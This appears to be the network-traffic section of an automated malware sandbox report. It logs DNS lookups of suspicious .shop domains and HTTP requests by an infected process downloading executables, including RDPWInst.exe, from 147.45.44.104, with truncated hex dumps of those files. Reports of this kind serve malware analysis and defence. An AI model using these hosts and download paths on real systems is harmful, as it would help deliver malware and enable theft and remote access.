Sep 27, 2024 00:15:12.494857073 CEST	192.168.2.4	1.1.1.1	0x731c	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:13.448158979 CEST	192.168.2.4	1.1.1.1	0xc483	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.396934032 CEST	192.168.2.4	1.1.1.1	0x3f94	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.516217947 CEST	192.168.2.4	1.1.1.1	0x80cd	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.207473993 CEST	192.168.2.4	1.1.1.1	0x7ed1	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:18.172069073 CEST	192.168.2.4	1.1.1.1	0x13e1	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:19.553369999 CEST	192.168.2.4	1.1.1.1	0xb8b0	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:30.626862049 CEST	192.168.2.4	1.1.1.1	0x225c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:35.007052898 CEST	192.168.2.4	1.1.1.1	0xab06	Standard query (0)	hansgborn.eu	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:39.390388966 CEST	192.168.2.4	1.1.1.1	0xce8f	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 00:14:26.439091921 CEST	1.1.1.1	192.168.2.4	0xfede	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:07.184736967 CEST	1.1.1.1	192.168.2.4	0xa62e	No error (0)	wallkedsleeoi.shop	104.21.36.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:07.184736967 CEST	1.1.1.1	192.168.2.4	0xa62e	No error (0)	wallkedsleeoi.shop	172.67.194.216	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:08.177232981 CEST	1.1.1.1	192.168.2.4	0x5b13	No error (0)	gutterydhowi.shop	104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:08.177232981 CEST	1.1.1.1	192.168.2.4	0x5b13	No error (0)	gutterydhowi.shop	172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:09.114937067 CEST	1.1.1.1	192.168.2.4	0x9409	No error (0)	ghostreedmnu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:09.114937067 CEST	1.1.1.1	192.168.2.4	0x9409	No error (0)	ghostreedmnu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:10.052309036 CEST	1.1.1.1	192.168.2.4	0x1e8c	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:10.052309036 CEST	1.1.1.1	192.168.2.4	0x1e8c	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:11.300513983 CEST	1.1.1.1	192.168.2.4	0xb0ee	No error (0)	vozmeatillu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:11.300513983 CEST	1.1.1.1	192.168.2.4	0xb0ee	No error (0)	vozmeatillu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:12.510329008 CEST	1.1.1.1	192.168.2.4	0x731c	No error (0)	drawzhotdog.shop	172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:12.510329008 CEST	1.1.1.1	192.168.2.4	0x731c	No error (0)	drawzhotdog.shop	104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:13.461260080 CEST	1.1.1.1	192.168.2.4	0xc483	No error (0)	fragnantbui.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:13.461260080 CEST	1.1.1.1	192.168.2.4	0xc483	No error (0)	fragnantbui.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.413163900 CEST	1.1.1.1	192.168.2.4	0x3f94	No error (0)	stogeneratmns.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.413163900 CEST	1.1.1.1	192.168.2.4	0x3f94	No error (0)	stogeneratmns.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.526509047 CEST	1.1.1.1	192.168.2.4	0x80cd	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.222239017 CEST	1.1.1.1	192.168.2.4	0x7ed1	No error (0)	reinforcenh.shop	172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.222239017 CEST	1.1.1.1	192.168.2.4	0x7ed1	No error (0)	reinforcenh.shop	104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:18.178950071 CEST	1.1.1.1	192.168.2.4	0x13e1	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:19.574954033 CEST	1.1.1.1	192.168.2.4	0xb8b0	No error (0)	ballotnwu.site	172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:19.574954033 CEST	1.1.1.1	192.168.2.4	0xb8b0	No error (0)	ballotnwu.site	104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:30.635106087 CEST	1.1.1.1	192.168.2.4	0x225c	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:30.635106087 CEST	1.1.1.1	192.168.2.4	0x225c	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:30.635106087 CEST	1.1.1.1	192.168.2.4	0x225c	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:35.025650978 CEST	1.1.1.1	192.168.2.4	0xab06	No error (0)	hansgborn.eu	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:35.025650978 CEST	1.1.1.1	192.168.2.4	0xab06	No error (0)	hansgborn.eu	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:39.399322033 CEST	1.1.1.1	192.168.2.4	0xce8f	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

5.75.211.162

wallkedsleeoi.shop

gutterydhowi.shop

ghostreedmnu.shop

offensivedzvju.shop

vozmeatillu.shop

drawzhotdog.shop

fragnantbui.shop

stogeneratmns.shop

reinforcenh.shop

ballotnwu.site

hansgborn.eu

147.45.44.104

cowod.hopto.org

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49764	147.45.44.104	80	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:15:05.621565104 CEST	195	OUT	GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:15:06.278753996 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:06 GMT Content-Type: application/octet-stream Content-Length: 385064 Last-Modified: Thu, 26 Sep 2024 22:09:48 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5dbac-5e028" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ `S(& H.textD `.rsrc@@.reloc@B H0yYYlv^5fH$/Wazz5O7fSl\RBk5EqvBf9v;(F Jgi(BBMs<ub l]Qg\Bc$fVGZ.8lH;!"pUO8Y"d\dD"sm}c#?4?Y#0VSX\|G.g:!rM[~eBpbz{`5\|\|bOGAh}s
Sep 27, 2024 00:15:06.278795958 CEST	1236	IN	Data Raw: 38 a0 ec cc 57 dc 50 61 47 3f b0 95 f7 55 f7 4b 25 ea 39 5d ff 7c 81 f9 ae 87 b6 77 63 5c 7c 9c e0 42 9a aa 4b 3d 9f 44 8d 15 75 0a 10 47 a3 40 b9 1d 71 fd 17 d3 79 30 67 e6 d1 e5 35 d8 ac 09 69 9a 8c a7 f3 13 a1 04 3c 06 74 5a e9 d0 02 51 13 87 Data Ascii: 8WPaG?UK%9]\|wc\\|BK=DuG@qy0g5i<tZQBg*M-jX=dI+:&zIj7eG@p)l{ >@~yM%H};7$lWdTtymhQQ;?(sx_/u9bO[
Sep 27, 2024 00:15:06.278829098 CEST	448	IN	Data Raw: 78 31 03 30 a5 b4 37 4e b6 91 c7 59 cd cb 89 0b d3 c8 22 34 53 ee 3d 10 65 5d a4 39 04 a2 eb a1 0d 84 e2 79 8e 91 fb 9b 6b 3b b2 ea ca bf de 4e 93 dc d2 e7 1e 7f 0d 78 ab 1f 73 d6 8c 4a 80 66 ab f9 eb 72 71 5f 9b 59 89 38 9d 05 82 fc 42 bb 27 e4 Data Ascii: x107NY"4S=e]9yk;NxsJfrq_Y8B'LUa>bnD8QvG30EAa\qk/. l4J1B2 e?BOcAy;!,ymT9D?]GjFxkh*s:t]
Sep 27, 2024 00:15:06.278861046 CEST	1236	IN	Data Raw: 70 4c 26 45 79 c9 d0 59 88 33 ca 65 e4 86 a5 24 7b 3e c1 7d b2 cf 94 62 cc e5 3c 37 01 0f dc 4f 52 04 72 11 d0 57 75 12 53 5b 08 76 b4 90 a7 58 f1 0d 76 fb 40 f4 33 51 fc a9 bd 42 28 67 05 c0 b9 ad 75 30 5c 77 c0 2f af c6 69 1e c1 85 e4 5b 16 5c Data Ascii: pL&EyY3e${>}b<7ORrWuS[vXv@3QB(gu0\w/i[\Wu2R/RuQ^\ZwP;;^>)m7xz$PT+s%*K_!%#VN?Pt)^W-L Xj^~Q!aq
Sep 27, 2024 00:15:06.278894901 CEST	1236	IN	Data Raw: a5 a1 85 35 aa ac 8b b6 cd 97 f9 54 72 da e4 f5 6f 87 cb 52 77 b4 b1 ef 3b 0e 69 d6 30 42 53 b9 7f a6 b1 61 2c ea 2d 12 99 ae 28 74 7b e8 6f 01 d2 bc f2 55 ca fc 6c 73 ab 39 11 cb 5f cc 5d 86 9a 62 bc 56 d5 5e cb 1a cf 6a 73 73 03 9c 06 05 32 9b Data Ascii: 5TroRw;i0BSa,-(t{oUls9_]bV^jss2W5!YXdW`DA)ETp"Dv/8M9`(yX"msFl,'`8eW2-[ssqS[o[njSoXk[ISzWC7r R$
Sep 27, 2024 00:15:06.278928041 CEST	1236	IN	Data Raw: bc 8c 26 77 e3 4f 9b 7a 6a e2 f3 9c 97 e3 7e 96 41 e7 df dd 7e 85 8e 0b fe 1f c5 e1 8c bd 08 44 76 bc c8 c6 80 a8 cf 46 f3 17 fd 9c 7b 74 83 c9 62 c5 3b fc 17 e9 be 08 d0 1f b5 de e0 75 8c 71 49 11 c5 f4 16 b4 41 dd 88 20 17 6b 46 06 2e ec 21 d2 Data Ascii: &wOzj~A~DvF{tb;uqIA kF.!-K%(:;;O5Z&s(0LzPrH6{RzZ!;rFG 4>YuIcxb$%k(\|DjkTjE@WjxiLld}u[hk
Sep 27, 2024 00:15:06.278961897 CEST	1236	IN	Data Raw: b2 a2 09 e4 0c e1 17 6d d5 ce e7 90 54 7d 1f 12 a0 cd 9d da 66 b4 16 8c 9e 55 50 98 bf 87 64 43 88 86 75 68 51 14 f6 3e fe 91 dc dd 48 42 ef 0a 00 d4 9e 7d e0 9d 46 97 9d 8a c3 e8 4a a6 c3 17 c1 08 dc 06 5c 85 b2 bd 2d 56 a9 13 2b fd a0 c4 89 3e Data Ascii: mT}fUPdCuhQ>HB}FJ\-V+>sqHFIN$+<C][LT;_C1!OvGS[v?66tFn4Rw~&hs5X_%id\AUx(h3GY/$eEn'XjlN
Sep 27, 2024 00:15:06.278994083 CEST	328	IN	Data Raw: cb f5 f8 ce 98 cd 4d 25 b5 b2 fc e0 7e ee 83 ca f6 ec b2 f1 16 57 8a bf 1f a1 a3 f7 fc 23 cb 23 86 bf f3 04 48 50 d0 a6 9f cc 82 ab 50 b9 ab 23 36 68 74 4a 3e 99 e9 b9 50 07 5e 08 3e aa fa ac 0a 4d 08 78 46 bc f2 17 81 b2 eb 2e 27 38 40 ca 5a e5 Data Ascii: M%~W##HPP#6htJ>P^>MxF.'8@ZEW'Ju3rS`b5KiYR-2~iACL5h-7JE.)?mJXxe8[e22/3@l`n\|\|}R&]D6(:),3i:K
Sep 27, 2024 00:15:06.279027939 CEST	1236	IN	Data Raw: a2 a2 20 c4 dd 31 7b 0d 5d a6 48 4d 07 49 45 d3 4e 22 6e 2d 82 f7 ec 90 69 d4 4a 6a 2f b4 ba b5 14 2f dc 86 1f a2 1a 13 a4 82 c0 7a 3c fe ac 94 88 9d b2 94 e2 0c 62 4a 32 32 93 ad 37 a1 c2 0a fe 6f 1c 29 9e a6 3c bb e9 09 de 30 9d 64 cd 57 e8 ed Data Ascii: 1{]HMIEN"n-iJj//z<bJ227o)<0dW ;7jqz1zuGQ9vTE)NFNUiZ{{M!xzU!Y/3+,?1{=jh70D%3="PQ5~%HqBBltK&(
Sep 27, 2024 00:15:06.279057980 CEST	224	IN	Data Raw: 56 79 e7 2f d1 ec ec 30 66 b9 4c a0 81 ce 3b 60 db 1d cc 6a 5a 93 c9 1b 2a 85 5c da 55 d2 39 e0 d8 4b 9b eb f8 27 a4 1d 36 da 61 ba 44 9f 14 7f a2 2d 60 88 89 05 5d a9 1a f1 cc f0 f3 b0 34 cd 93 64 4c f2 ad e0 bf e8 6e 2d e3 e8 f3 9b 5d 9b 1c a5 Data Ascii: Vy/0fL;`jZ*\U9K'6aD-`]4dLn-]Hc7W5eXz=:0{wa:28W@?RL(&jt;b2L5nx pp}<9B,t6j0Zvi5@KsLP
Sep 27, 2024 00:15:06.286652088 CEST	1236	IN	Data Raw: f0 14 b5 2a 0d 4e 8c 0d 55 37 d1 95 35 9a d7 5d fe 64 d2 5c 53 c6 2c 81 41 f1 69 e7 ac ac 20 6a 73 af 7d 89 95 c1 6e 52 b9 4c f8 25 47 51 81 28 38 51 79 29 45 cd 62 fb 6b 7b 20 e9 97 0f 26 25 44 c5 6f cc b4 7b 65 59 56 a3 62 44 78 47 63 c7 45 ea Data Ascii: NU75]d\S,Ai js}nRL%GQ(8Qy)Ebk{ &%Do{eYVbDxGcET5rTrCHLu0aiv.SbX!5y/;CBb7@v~n(uR+)VeL7SSF]R0>sPa=;7,mm:Xa
Sep 27, 2024 00:15:08.712829113 CEST	192	OUT	GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:15:08.898118019 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:08 GMT Content-Type: application/octet-stream Content-Length: 413224 Last-Modified: Thu, 26 Sep 2024 22:09:34 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5db9e-64e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `;S@((&`: H.textD `.rsrc@ @@.reloc`&@B <H0^8=.Qv A3[RJ_f9\lvC#SsnB~E~i7}+V#8f#XWb(<O1$=UN8)LL(K,r%9LY=0T4&d.(U'="(>d+92p81Pa\q]X/a@0CPQBv6le24I3PC:v}QwpS(AQg'N_XmvgJ/J6^D^MIO45+e^
Sep 27, 2024 00:15:10.898087025 CEST	188	OUT	GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:15:11.279222965 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:10 GMT Content-Type: application/octet-stream Content-Length: 73216 Last-Modified: Thu, 26 Sep 2024 22:01:15 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5d9ab-11e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0" @@ `!S@` H.text `.rsrc@@@.reloc`@B!HtD%,("(6\|(0Vs1rp((2Js1s3(4Zrp((oE(N:rp(r&p((O(rp((rp(oE:rp(rp(rMp({rMp((RoS(Tb:rp(oU*0n(s(rpo(sooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49774	147.45.44.104	80	3396	C:\ProgramData\AFHDGDGIID.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:15:12.815418005 CEST	94	OUT	GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1 Host: 147.45.44.104 Connection: Keep-Alive
Sep 27, 2024 00:15:13.434382915 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:13 GMT Content-Type: application/octet-stream Content-Length: 1785344 Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f55533-1b3e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext\|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`\|@@p@@
Sep 27, 2024 00:15:13.434405088 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
Sep 27, 2024 00:15:13.434416056 CEST	1236	IN	Data Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40 Data Ascii: @B@C@B@BH@C\|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
Sep 27, 2024 00:15:13.434473991 CEST	1236	IN	Data Raw: 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 70 53 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 33 00 48 52 40 00 06 45 71 75 61 6c 73 03 Data Ascii: Self3pS@UnitName@Self@@3HR@Equals@@Self@Obj+PR@GetHashCode@@Self38T@ToString@@Self@@[0T@SafeCallExceptionl@
Sep 27, 2024 00:15:13.434485912 CEST	896	IN	Data Raw: 09 54 44 61 74 65 54 69 6d 65 01 02 00 8b c0 2c 1e 40 00 0e 0e 54 56 61 72 41 72 72 61 79 42 6f 75 6e 64 08 00 00 00 00 00 00 00 00 02 00 00 00 9c 10 40 00 00 00 00 00 02 0c 45 6c 65 6d 65 6e 74 43 6f 75 6e 74 02 00 9c 10 40 00 04 00 00 00 02 08 Data Ascii: TDateTime,@TVarArrayBound@ElementCount@LowBound\|@TVarArrayBoundArray(@@PVarArray@@@TVarArray@DimCount@Flags@Eleme
Sep 27, 2024 00:15:13.434495926 CEST	1236	IN	Data Raw: 00 00 00 00 00 02 07 52 61 77 44 61 74 61 02 00 02 00 90 b0 21 40 00 0d 0a 54 54 79 70 65 54 61 62 6c 65 fc ff ff 7f ff ff ff 1f e4 10 40 00 01 00 00 00 00 02 00 90 d4 21 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 ac 21 40 00 02 00 8b c0 ec 21 40 Data Ascii: RawData!@TTypeTable@!@PTypeTable!@!@PPackageTypeInfo"@"@TPackageTypeInfo@TypeCount!@TypeTable@UnitCount@UnitNames@"@PLibMo
Sep 27, 2024 00:15:13.434506893 CEST	1236	IN	Data Raw: 68 65 20 73 69 7a 65 73 20 6f 66 20 75 6e 65 78 70 65 63 74 65 64 20 6c 65 61 6b 65 64 20 6d 65 64 69 75 6d 20 61 6e 64 20 6c 61 72 67 65 20 62 6c 6f 63 6b 73 20 61 72 65 3a 20 00 00 00 00 20 62 79 74 65 73 3a 20 00 00 00 00 55 6e 6b 6e 6f 77 6e Data Ascii: he sizes of unexpected leaked medium and large blocks are: bytes: UnknownAnsiStringUnicodeStringUnexpected Memory Leak@H@JB@HJHJH@JB@HJHJHJHJH@JB@
Sep 27, 2024 00:15:13.434519053 CEST	1236	IN	Data Raw: 24 04 89 50 04 c6 05 c4 9a 44 00 00 8b c7 83 c4 24 5d 5f 5e 5b c3 90 53 56 57 55 83 c4 e0 8b f2 8b f8 8b c7 83 e8 04 8b 00 8b d8 83 e3 f0 83 eb 14 3b de 0f 83 e1 00 00 00 8b d3 c1 ea 02 03 d3 3b d6 76 04 8b ea eb 02 8b ee 8b d7 83 ea 10 83 e0 f0 Data Ascii: $PD$]_^[SVWU;;v$jD$PD$P{\|$upd$+D$;s\+J;sjh SD$Pt-jhSD$PtpZZwztj,
Sep 27, 2024 00:15:13.434537888 CEST	1236	IN	Data Raw: 00 89 f0 5f 5e 5b c3 5b 85 c0 0f 89 2b fa ff ff 31 c0 c3 8b 50 fc f6 c2 07 89 c1 53 8a 1d 4d 70 44 00 0f 85 e3 00 00 00 84 db 8b 1a 75 61 83 6a 0c 01 8b 42 08 74 2c 85 c0 89 4a 08 8d 40 01 89 41 fc 74 07 31 c0 88 03 5b c3 90 8b 4b 04 89 5a 14 89 Data Ascii: _^[[+1PSMpDuajBt,J@At1[KZJQS1[tBJHA19SuCRMpD#t=xDuQRjZY#oQRjZY%4zDtB=xDuj
Sep 27, 2024 00:15:13.434550047 CEST	96	IN	Data Raw: 29 d0 83 d7 ff 21 f8 01 d0 89 c5 89 cf 52 e8 a8 f7 ff ff 5a 85 c0 74 d1 81 fd 2c 0a 04 00 76 03 89 50 f8 89 c5 89 c2 89 f0 89 f9 e8 1f f3 ff ff 89 f0 e8 08 fb ff ff 89 e8 5d 5f 5e 5b c3 90 5e 5b f6 c1 03 0f 84 25 f6 ff ff 31 c0 c3 8b c0 53 8d 58 Data Ascii: )!RZt,vP]_^[^[%1SX`
